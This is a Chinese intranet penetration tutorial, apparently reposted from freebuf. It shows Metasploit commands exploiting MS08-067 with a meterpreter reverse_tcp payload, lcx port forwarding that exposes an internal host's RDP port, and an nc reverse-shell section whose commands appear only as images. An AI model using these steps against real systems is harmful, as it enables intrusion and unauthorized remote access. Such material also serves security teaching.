内网渗透漏洞利用实操报告 – 作者:凯信特安全团队

0x01 内网信息收集实施攻击

在同一个网段中,扫描主机存活信息,能确定一定范围,寻找目标主机,并且可以获得主机开放的端口;运行的服务,挖掘到存在的漏洞信息。

图片.png首先用nmap获取到有漏洞的主机,然后打开metasploit;启动postgresql服务;切换数据库账户,创建数据库账户,设置密码后,账户为msf3@。

#servuce postgresql start(启动postgresql服务)

#su postgres(切换posstgres账户)

#createuser msf3 –P(创建msf3账户)

#createdb –owner=msf3 msf3(创建数据库名为msf3)

#db_connect msf3:msf3@localhost/msf3(连接msf3账户)

#db_status(查看已连接数据库账户状态)

图片.png#search ms08_067(搜索微软系统命名代号是MS08_067漏洞)

#use exploit/windows/smb/ms08_067_netapi(使用msf里面的漏洞利用模块)

#show options(显示漏洞显示选项)

#set payloadwindows/meterpreter/reverse_tcp(设置反向TCP模块)

#exploit(开始攻击)

图片.png图片.png图片.png

0x02 LCX内网转向公网


内网机器上执行:lcx.exe –slave 公网IP +端口 内网IP +端口

例如:lcx.exe slave 192.168.1.118 51 192.168.1.119 3389

将内网(192.168.1.119)的3389端口转发到公网(192.168.1.118)的51端口

图片.png然后在公网的机器上:

Lcx.exe –listen 监听51端口,转发到公网机器的3389端口

例如:Lcx.exe listen 51 3389

图片.png这个时候已经将内网的3389转发到了公网机器的3389端口,我们在本地机器上远程公网IP+3389 ,就连接上了内网机器的3389

图片.png

0x03 NC 反弹CMDshell


本机:192.168.1.118(win7)

远程机器:192.168.1.119(xp)

正向连接:

在远程机器上(t参数可以省略)

图片.png在本地机器上:

图片.png成功之后,本地机器就获得了一个远程机器的shell:

图片.png

来源:freebuf.com 2019-01-18 09:22:52 by: 凯信特安全团队

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论